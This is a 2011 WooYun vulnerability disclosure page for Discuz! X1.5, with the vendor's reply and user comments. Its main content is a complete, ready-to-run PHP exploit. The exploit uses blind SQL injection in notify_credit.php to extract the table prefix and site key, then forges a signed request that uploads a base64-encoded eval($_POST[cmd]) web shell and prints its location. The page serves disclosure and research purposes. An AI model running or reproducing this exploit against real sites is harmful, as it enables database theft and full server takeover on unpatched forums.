当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02210

漏洞标题:discuz! X1.5 Get Shell 0day

相关厂商:Discuz!

漏洞作者: Black.Key

提交时间:2011-06-03 08:34

修复时间:2011-07-03 09:00

公开时间:2011-07-03 09:00

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-06-03: 细节已通知厂商并且等待厂商处理中
2011-06-03: 厂商已经确认,细节仅向厂商公开
2011-06-06: 细节向第三方安全合作伙伴开放
2011-07-28: 细节向核心白帽子及相关领域专家公开
2011-08-07: 细节向普通白帽子公开
2011-08-17: 细节向实习白帽子公开
2011-07-03: 细节向公众公开

简要描述:

可以自由写入一句话木马

详细说明:

以下为漏洞的EXP

<?php
print_r('
+---------------------------------------------------------------------------+
Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit by toby57 2010.11.05
mail: admin at bkey org
team: http://www.bkey.org
说明:alibaba把后续getshell代码添加了下去
+---------------------------------------------------------------------------+
');
if ($argc < 2) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url [pre]
Example:
php '.$argv[0].' http://localhost/
php '.$argv[0].' http://localhost/ xss_
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$url = $argv[1];
$pre = $argv[2]?$argv[2]:'pre_';
$target = parse_url($url);
extract($target);
$path1 = $path . '/api/trade/notify_credit.php';
$hash = array();
$hash = array_merge($hash, range(48, 57));
$hash = array_merge($hash, range(97, 102));
$tmp_expstr = "'";
$res = send();
if(strpos($res,'SQL syntax')==false){var_dump($res);die('Oooops.I can NOT hack it.');}
preg_match('/FROM\s([a-zA-Z_]+)forum_order/',$res,$match);
if($match[1])$pre = $match[1];
$tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE ''='";
$res = send();
if(strpos($res,"doesn't exist")!==false){
echo "Table_pre is WRONG!\nReady to Crack It.Please Waiting..\n";
for($i = 1;$i<20;$i++){
$tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND LENGTH(REPLACE(table_name,'forum_post_tableid',''))=$i AND ''='";
$res = send();
if(strpos($res,'SQL syntax')!==false){
$pre = '';
$hash2 = array();
$hash2 = array_merge($hash2, range(48, 57));
$hash2 = array_merge($hash2, range(97, 122));
$hash2[] = 95;
for($j = 1;$j <= $i; $j++){
for ($k = 0; $k <= 255; $k++) {
if(in_array($k, $hash2)) {
$char = dechex($k);
$tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND MID(REPLACE(table_name,'forum_post_tableid',''),$j,1)=0x{$char} AND ''='";
$res = send();
if(strpos($res,'SQL syntax')!==false){
echo chr($k);
$pre .= chr($k);break;
}
}
}
}
if(strlen($pre)){echo "\nCracked...Table_Pre:".$pre."\n";break;}else{die('GET Table_pre Failed..');};
} } };
echo "Please Waiting....\n";
$sitekey = '';
for($i = 1;$i <= 32; $i++){
for ($k = 0; $k <= 255; $k++) {
if(in_array($k, $hash)) {
$char = dechex($k);
$tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE skey=0x6D795F736974656B6579 AND MID(svalue,{$i},1)=0x{$char} AND ''='";
$res = send();
if(strpos($res,'SQL syntax')!==false){
echo chr($k);
$sitekey .= chr($k);break;
}}}}
/*
By: alibaba
修改与添加了一些代码,如果成功就能得到shell
一句话秘密是 : cmd
*/
if(strlen($sitekey)!=32)
{
echo "\nmy_sitekey not found. try blank my_sitekey\n";
}
else echo "\nmy_sitekey:{$sitekey}\n";
echo "\nUploading Shell...";
$module = 'video';
$method = 'authauth';
$params = 'a:3:{i:0;i:1;i:1;s:36:"PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4=";i:2;s:3:"php";}';
$sign = md5($module . '|' . $method . '|' . $params . '|' . $sitekey);
$data = "module=$module&method=$method&params=$params&sign=$sign";
$path2 = $path . "/api/manyou/my.php";
POST($host,80,$path2,$data,30);
echo "\nGetting Shell Location...\n";
$file = '';
for($i = 1;$i <= 32; $i++){
for ($k = 0; $k <= 255; $k++) {
if(in_array($k, $hash)) {
$char = dechex($k);
$tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_member_field_home WHERE uid=1 AND MID(videophoto,{$i},1)=0x{$char} AND ''='";
$res = send();
if(strpos($res,'SQL syntax')!==false){
echo chr($k);
$file .= chr($k);break;
}
}
}
}
echo "\nShell: $host$path/data/avatar/". substr($file,0,1) . "/" . substr($file,1,1) . "/$file.php";
exit;
function sign($exp_str){
return md5("attach=tenpay&mch_vno={$exp_str}&retcode=0&key=");
}
function send(){
global $host, $path1, $tmp_expstr;

$expdata = "attach=tenpay&retcode=0&trade_no=%2527&mch_vno=".urlencode(urlencode($tmp_expstr))."&sign=".sign($tmp_expstr);
return POST($host,80,$path1,$expdata,30);
}
function POST($host,$port,$path,$data,$timeout, $cookie='') {
$buffer='';
$fp = fsockopen($host,$port,$errno,$errstr,$timeout);
if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno);
else {
fputs($fp, "POST $path HTTP/1.0\r\n");
fputs($fp, "Host: $host\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: ".strlen($data)."\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data."\r\n\r\n");

while(!feof($fp))
{
$buffer .= fgets($fp,4096);
}

fclose($fp);
}
return $buffer;
}
?>


漏洞证明:

修复方案:

升级至Discuz! X2

版权声明:转载请注明来源 Black.Key@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2011-06-03 12:28

厂商回复:

该漏洞已于3月22提供补丁修复,但由于部分站长仍未补丁,由于此转载为exp全文,为了不必要的误会以及传播,影响到仍旧未补丁的站长或造成其他用户的误会,对此漏洞1分通过,暂不忽略或公开。

最新状态:

暂无


漏洞评价:

评论

  1. 2011-06-03 18:37 | 阿神 ( 实习白帽子 | Rank:33 漏洞数:4 | 值得。)

    貌似利用不到,能爆出一句话地址,但是打不开呢,好像根本就没传上去 似的

  2. 2011-06-04 14:28 | rootsecurity ( 实习白帽子 | Rank:77 漏洞数:20 | 关注开源,关注网络安全!INSERT INTO `w...)

    确实很多站都还没有修补

  3. 2011-07-03 11:12 | 晴天小铸 ( 普通白帽子 | Rank:106 漏洞数:31 | 退出黑客界的纠纷,低调求发展。)

    DZ 1.5 getshell原理是什么哪个NB帮我讲解下.

  4. 2012-05-29 15:19 | her0ma ( 核心白帽子 | Rank:598 漏洞数:84 | 专注小厂商三十年!)

    toby57 这个貌似比较早了吧 t00ls当时放出的?

  5. 2012-09-27 17:24 | davie ( 实习白帽子 | Rank:34 漏洞数:4 | 关注安全)

    好久前的吧?我的漏洞就不审核 ,外面复制来的就审核了!哎。》!。